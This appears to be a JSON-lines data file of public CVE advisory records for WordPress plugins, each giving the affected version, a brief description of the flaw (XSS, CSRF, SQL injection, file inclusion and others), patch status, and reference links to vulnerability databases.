{"CVE_ID":"CVE-2024-13512","slug":"wonder-fontawesome","versionImpact":"0.8","description":"The Wonder FontAwesome plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wonder-fontawesome\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wonder-fontawesome\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494f5c9f-ef5b-48d8-8f3a-27e5ed4bea5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494f5c9f-ef5b-48d8-8f3a-27e5ed4bea5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13677","slug":"get-bookings-wp","versionImpact":"1.1.27","description":"The GetBookingsWP \u2013 Appointments Booking Calendar Plugin For WordPress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.1.27. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-bookings-wp\\\/trunk\\\/classes\\\/user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-bookings-wp\\\/trunk\\\/classes\\\/user.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b0dc03-3715-41f8-8888-1cccddb39c0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b0dc03-3715-41f8-8888-1cccddb39c0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1405","slug":"post-type-x","versionImpact":"1.7.11","description":"The Product Catalog Simple plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's show_products shortcode in all versions up to, and including, 1.7.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246414\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246414\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-type-x\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-type-x\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2ddd9a2-79d7-4f9c-9832-25c3363d3ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2ddd9a2-79d7-4f9c-9832-25c3363d3ce9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13909","slug":"accredible-certificates","versionImpact":"1.4.9","description":"The Accredible Certificates & Open Badges plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accredible-certificates\\\/tags\\\/1.4.9\\\/users_list.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accredible-certificates\\\/tags\\\/1.4.9\\\/users_list.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accredible-certificates\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accredible-certificates\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f96d3773-29a1-44bd-904a-905aff2b345e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f96d3773-29a1-44bd-904a-905aff2b345e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2158","slug":"wp-review","versionImpact":"5.3.5","description":"The WordPress Review Plugin: The Ultimate Solution for Building a Review Website plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.3.5 via the Post custom fields. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP file types can be uploaded and included, or pearcmd is enabled on a server with register_argc_argv also enabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a058e6bf-109f-4985-8aad-08858553c4c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a058e6bf-109f-4985-8aad-08858553c4c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47581","slug":"wpeventplus","versionImpact":"2.6.0","description":"Deserialization of Untrusted Data vulnerability in Elbisnero WordPress Events Calendar Registration & Tickets allows Object Injection.This issue affects WordPress Events Calendar Registration & Tickets: from n\/a through 2.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5929","slug":"the-countdown","versionImpact":"2.0.1","description":"The The Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018clientId\u2019 parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-countdown\\\/tags\\\/2.0.1\\\/the-countdown.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-countdown\\\/tags\\\/2.0.1\\\/the-countdown.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-countdown\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-countdown\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34578df8-661c-4c54-b06c-e1d787ca3c55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34578df8-661c-4c54-b06c-e1d787ca3c55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6174","slug":"qwiz-online-quizzes-and-flashcards","versionImpact":"3.9.4","description":"The Qwizcards | online quizzes and flashcards WordPress plugin through 3.9.4 does not sanitise and escape the \"_stylesheet\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or any other user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0148","slug":"gallery-factory-lite","versionImpact":"2.0.0","description":"The Gallery Factory Lite WordPress plugin through 2.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f15f2f2c-2053-4b93-8064-15b5243a4021\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f15f2f2c-2053-4b93-8064-15b5243a4021\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0644","slug":"push-notification-for-wp-by-pushassist","versionImpact":"3.0.8","description":"The Push Notifications for WordPress by PushAssist WordPress plugin through 3.0.8 does not sanitise and escape various parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f5089c-36f3-4d12-bca5-99cd3ae78f67\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f5089c-36f3-4d12-bca5-99cd3ae78f67\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2189","slug":"stax-addons-for-elementor","versionImpact":"1.4.3","description":"The Elementor Addons, Widgets and Enhancements \u2013 Stax plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the toggle_widget function in versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable Elementor widgets.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926550bb-265d-4811-a375-10c47e9fb4d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926550bb-265d-4811-a375-10c47e9fb4d6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3369","slug":"about-me-3000","versionImpact":"2.2.6","description":"The About Me 3000 widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/about-me-3000\\\/trunk\\\/aboutme3000.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/about-me-3000\\\/trunk\\\/aboutme3000.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be6f660f-041a-42f2-ab5b-72aedf75727d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be6f660f-041a-42f2-ab5b-72aedf75727d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1392","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5141","slug":"rotatingtweets","versionImpact":"1.9.10","description":"The Rotating Tweets (Twitter widget and shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rotatingtweets' shortcode in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02cff893-4f41-4bb0-9fb0-344a3a8afa0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02cff893-4f41-4bb0-9fb0-344a3a8afa0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rotatingtweets\\\/tags\\\/1.9.10\\\/rotatingtweets.php#L2267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rotatingtweets\\\/tags\\\/1.9.10\\\/rotatingtweets.php#L2267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6720","slug":"light-poll","versionImpact":"1.0.0","description":"The Light Poll WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1449be1-ae85-46f4-b5ba-390d25b87723\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1449be1-ae85-46f4-b5ba-390d25b87723\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8324","slug":"xo-liteslider","versionImpact":"3.8.6","description":"The XO Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018get_slider\u2019 function in all versions up to, and including, 3.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be51c54d-b0f7-42b2-b9b3-1b5832e10a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be51c54d-b0f7-42b2-b9b3-1b5832e10a6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L315\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51708","slug":"narnoo-commerce-manager","versionImpact":"1.6.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Narnoo Wordpress developer Narnoo Commerce Manager allows Reflected XSS.This issue affects Narnoo Commerce Manager: from n\/a through 1.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/narnoo-commerce-manager\\\/wordpress-narnoo-commerce-manager-plugin-1-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/narnoo-commerce-manager\\\/wordpress-narnoo-commerce-manager-plugin-1-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10116","slug":"twitter-follow","versionImpact":"0.2","description":"The Twitter Follow Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'username' parameter in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twitter-follow\\\/trunk\\\/twitter-follow.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twitter-follow\\\/trunk\\\/twitter-follow.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/twitter-follow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/twitter-follow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11433","slug":"surbma-salesautopilot-shortcode","versionImpact":"2.0","description":"The Surbma | SalesAutopilot Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sa-form' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surbma-salesautopilot-shortcode\\\/trunk\\\/surbma-salesautopilot-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surbma-salesautopilot-shortcode\\\/trunk\\\/surbma-salesautopilot-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/surbma-salesautopilot-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/surbma-salesautopilot-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626c82a1-4157-4294-9563-08accccf2a10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626c82a1-4157-4294-9563-08accccf2a10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13460","slug":"we-testimonial-slider","versionImpact":"1.5","description":"The WE \u2013 Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Testimonial Author Names in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/we-testimonial-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/we-testimonial-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/704a7df0-8e6b-4145-96a2-d179a6d75aac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/704a7df0-8e6b-4145-96a2-d179a6d75aac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13896","slug":"wp-geshi-highlight","versionImpact":"1.4.3","description":"The WP-GeSHi-Highlight \u2014 rock-solid syntax highlighting for 259 languages WordPress plugin through 1.4.3 processes user-supplied input as a regular expression via the wp_geshi_filter_replace_code() function, which could lead to Regular Expression Denial of Service (ReDoS) issue","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2944","slug":"jeg-elementor-kit","versionImpact":"2.6.12","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Button and Countdown Widgets in all versions up to, and including, 2.6.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290315\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7baa8cca-96a5-4d6b-86d5-53cd1a4675cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7baa8cca-96a5-4d6b-86d5-53cd1a4675cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39411","slug":"wpt-whatsapp","versionImpact":"2.2.12","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Indie_Plugins WhatsApp Click to Chat Plugin for WordPress.This issue affects WhatsApp Click to Chat Plugin for WordPress: from n\/a through 2.2.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpt-whatsapp\\\/vulnerability\\\/wordpress-whatsapp-click-to-chat-plugin-for-wordpress-plugin-2-2-12-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpt-whatsapp\\\/vulnerability\\\/wordpress-whatsapp-click-to-chat-plugin-for-wordpress-plugin-2-2-12-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5813","slug":"import-products-to-wc","versionImpact":"1.2.7","description":"The Amazon Products to WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wcta2w_get_amazon_product_callback() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to create new products.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/functions.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/functions.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0906540-46fc-4f76-9265-cb87c6340fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0906540-46fc-4f76-9265-cb87c6340fad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0147","slug":"flexible-captcha","versionImpact":"4.1","description":"The Flexible Captcha WordPress plugin through 4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af9cbb4a-42fc-43c5-88f3-349b417f1a6a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af9cbb4a-42fc-43c5-88f3-349b417f1a6a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
